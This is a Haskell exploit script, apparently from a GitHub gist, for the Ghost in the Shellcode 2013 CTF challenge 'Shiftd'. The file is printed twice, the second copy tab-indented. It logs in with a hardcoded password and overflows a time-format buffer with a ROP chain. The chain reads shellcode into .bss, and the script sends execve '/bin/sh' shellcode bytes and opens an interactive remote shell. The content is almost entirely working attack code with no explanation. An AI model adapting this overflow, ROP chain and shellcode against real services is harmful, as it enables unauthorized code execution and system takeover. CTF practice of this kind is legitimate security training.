Tosainu/exploit.hs

## exploit.hs
#!/usr/bin/env stack
-- stack --stack-yaml ./stack.yaml runghc --package pwn

-- Ghost in the Shellcode 2013: Shiftd
-- http://shell-storm.org/repo/CTF/GITS-2013/Pwnable/Shiftd-100/

{-# LANGUAGE OverloadedStrings #-}

import           Data.Bits
import qualified Data.ByteString.Char8 as BS
import           Data.Maybe
import           Data.Monoid           ((<>))
import           Data.Word
import           Numeric               (showHex)

-- https://github.com/Tosainu/pwn.hs
import           Pwn

main :: IO ()
main = do
  r <- remote "192.168.122.10" 4000

  sendline r "NowIsTheWinterOfOurDiscountTent\x00"
  recvuntil r "Welcome to Shifty's Time Formatting Service!\n"
  success "login successful!"

  getLine

  recvuntil r "What is your name?\n"
  sendline r "nyan\x00"

  recvuntil r "Please provide a time format:\n"

  -- sub.time_formatting_service ();
  --         ; var int local_c0000005h @ rbp-0x3ffffffb
  --         ; var int time @ rbp-0x828
  --         ; var int formatted_time @ rbp-0x820
  --         ; var int time_format @ rbp-0x420
  --         ; var int name @ rbp-0x20
  --         ; var int time_tm @ rbp-0x10
  --         ; var int local_4h @ rbp-0x4
  let formatlen = 0x400
      rip       = formatlen + 0x20 + 0x8

      bss        = 0x00601070
      read_until = 0x004007f4 -- read_until(buf, len, delim)

      -- ROP gadgets
      mov_edi_rsp_0x30 = 0x00400b10 -- 0x00400b10: mov edi, dword [rsp+0x30] ;
                                    --             add rsp, 0x38 ;
                                    --             ret  ;  (1 found)
      mov_esi_rsp_0x28 = 0x00400b0b -- 0x00400b0b: mov esi, dword [rsp+0x28] ;
                                    --             mov r15, qword [rsp+0x30] ;
                                    --             add rsp, 0x38 ;
                                    --             ret  ;  (1 found)

      -- http://shell-storm.org/shellcode/files/shellcode-806.php
      shellcode = BS.pack "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

      -- RDX: 0x0
      -- RSI: 0x7fb3707f17a0 --> 0x0
      -- RDI: 0x0
      -- RBP: 0x4141414141414141 ('AAAAAAAA')
      -- RSP: 0x7ffe6f57c958 --> 0x4007c1 (pop    rbx)
      -- RIP: 0x4009eb (ret)
      timefmt = "%F\x00"
      buf = BS.concat $ catMaybes
            [ Just timefmt
            , Just $ BS.replicate (rip - BS.length timefmt) 'A'
            , p64 mov_edi_rsp_0x30          -- $rdi <- bss+0x800
            , Just $ BS.replicate 0x30 'A'
            , p64 $ bss + 0x800
            , p64 mov_esi_rsp_0x28          -- $rsi <- 0x1000
            , Just $ BS.replicate 0x28 'A'
            , p64 0x1000
            , Just $ BS.replicate 0x08 'A'
            , p64 read_until                -- read_until(bss+0x800, 0x1000, '\0')
            , p64 $ bss + 0x800             -- return to shellcode
            ]

  info "overwrite return address"
  sendline r buf

  recvuntil r "Thank you! Come again!\n"

  info "send shellcode"
  sendline r $ BS.snoc shellcode '\x00'

  interactive r
	#!/usr/bin/env stack
	-- stack --stack-yaml ./stack.yaml runghc --package pwn

	-- Ghost in the Shellcode 2013: Shiftd
	-- http://shell-storm.org/repo/CTF/GITS-2013/Pwnable/Shiftd-100/

	{-# LANGUAGE OverloadedStrings #-}

	import Data.Bits
	import qualified Data.ByteString.Char8 as BS
	import Data.Maybe
	import Data.Monoid ((<>))
	import Data.Word
	import Numeric (showHex)

	-- https://github.com/Tosainu/pwn.hs
	import Pwn

	main :: IO ()
	main = do
	r <- remote "192.168.122.10" 4000

	sendline r "NowIsTheWinterOfOurDiscountTent\x00"
	recvuntil r "Welcome to Shifty's Time Formatting Service!\n"
	success "login successful!"

	getLine

	recvuntil r "What is your name?\n"
	sendline r "nyan\x00"

	recvuntil r "Please provide a time format:\n"

	-- sub.time_formatting_service ();
	-- ; var int local_c0000005h @ rbp-0x3ffffffb
	-- ; var int time @ rbp-0x828
	-- ; var int formatted_time @ rbp-0x820
	-- ; var int time_format @ rbp-0x420
	-- ; var int name @ rbp-0x20
	-- ; var int time_tm @ rbp-0x10
	-- ; var int local_4h @ rbp-0x4
	let formatlen = 0x400
	rip = formatlen + 0x20 + 0x8

	bss = 0x00601070
	read_until = 0x004007f4 -- read_until(buf, len, delim)

	-- ROP gadgets
	mov_edi_rsp_0x30 = 0x00400b10 -- 0x00400b10: mov edi, dword [rsp+0x30] ;
	-- add rsp, 0x38 ;
	-- ret ; (1 found)
	mov_esi_rsp_0x28 = 0x00400b0b -- 0x00400b0b: mov esi, dword [rsp+0x28] ;
	-- mov r15, qword [rsp+0x30] ;
	-- add rsp, 0x38 ;
	-- ret ; (1 found)

	-- http://shell-storm.org/shellcode/files/shellcode-806.php
	shellcode = BS.pack "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

	-- RDX: 0x0
	-- RSI: 0x7fb3707f17a0 --> 0x0
	-- RDI: 0x0
	-- RBP: 0x4141414141414141 ('AAAAAAAA')
	-- RSP: 0x7ffe6f57c958 --> 0x4007c1 (pop rbx)
	-- RIP: 0x4009eb (ret)
	timefmt = "%F\x00"
	buf = BS.concat $ catMaybes
	[ Just timefmt
	, Just $ BS.replicate (rip - BS.length timefmt) 'A'
	, p64 mov_edi_rsp_0x30 -- $rdi <- bss+0x800
	, Just $ BS.replicate 0x30 'A'
	, p64 $ bss + 0x800
	, p64 mov_esi_rsp_0x28 -- $rsi <- 0x1000
	, Just $ BS.replicate 0x28 'A'
	, p64 0x1000
	, Just $ BS.replicate 0x08 'A'
	, p64 read_until -- read_until(bss+0x800, 0x1000, '\0')
	, p64 $ bss + 0x800 -- return to shellcode
	]

	info "overwrite return address"
	sendline r buf

	recvuntil r "Thank you! Come again!\n"

	info "send shellcode"
	sendline r $ BS.snoc shellcode '\x00'

	interactive r